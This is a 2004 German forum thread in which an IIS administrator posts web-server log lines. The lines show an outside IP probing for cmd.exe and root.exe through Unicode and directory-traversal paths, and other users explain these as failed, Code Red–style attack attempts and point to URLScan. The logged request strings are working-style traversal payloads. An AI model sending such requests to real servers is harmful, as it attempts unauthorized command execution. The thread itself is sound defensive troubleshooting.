Crockett 10 Geschrieben 26. Juli 2004 Melden Geschrieben 26. Juli 2004 Hallo ! Hiermal ein Auszug aus dem Log von meiner IIS. ------ 2004-07-26 07:08:11 192.168.0.5 GET /scripts/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /MSADC/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /c/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /d/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 ---------- Am Ende steht immer der Code 404, heißt das das diese Versuche gescheitert sind oder sollte ich mir sorgen machen ? Gruß Christian Zitieren
din 10 Geschrieben 26. Juli 2004 Melden Geschrieben 26. Juli 2004 jepp das ist ein Attack versuch, da versucht jemand sogenannte Unicodes erfolgreich zu testen ums so einen zugriff auf das system zu erhalten. Könnte ein überbleibsel des Code Reds sein der simmer noch irgendwo im Netz umher irrt. Also einfach Windows aktuell halten dann sollte dies keine Bedrohung mehr darstellen. MFG dIN Zitieren
Crockett 10 Geschrieben 27. Juli 2004 Autor Melden Geschrieben 27. Juli 2004 @din Danke für die Antwort... Sind die Versuche denn fehlgeschlagen weil hinten der Code 404 im Log steht ? Kann man evtl so etwas lokal testen ob der Server auf sowas reagiert ? Gruß Christian Zitieren
Lian 2.539 Geschrieben 27. Juli 2004 Melden Geschrieben 27. Juli 2004 Jep, beim Ergebnis 404 (File not Found) sind die Attacken erfolglos. Trotzdem mal über das IIS Lockdown Tool nachdenken - URLscan ist Dein Freund: http://www.microsoft.com/technet/security/tools/locktool.mspx Zitieren
Crockett 10 Geschrieben 28. Juli 2004 Autor Melden Geschrieben 28. Juli 2004 @Lian Danke für den Link.. Hatte darüber mal was gelesen und auch schon mal runtergeladen. Ließ sich bei mir aber nicht installieren. Setze einen SBS 2003 ein wo der IIS 6.0 drauf läuft. Kann es sein das das Tool nur für die älteren Versionen vom Windows Servern und IIS ist ? Gruß Christian Zitieren
Lian 2.539 Geschrieben 28. Juli 2004 Melden Geschrieben 28. Juli 2004 Richtig, bei 2003 ist das Lockdown Tool schon eingebaut. Zitieren
Crockett 10 Geschrieben 29. Juli 2004 Autor Melden Geschrieben 29. Juli 2004 @Lian Habe beim 2003 Server nichts gefunden ? Kann man das konfigurieren oder ist das einfach Build In ? Gruß Christian Zitieren
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.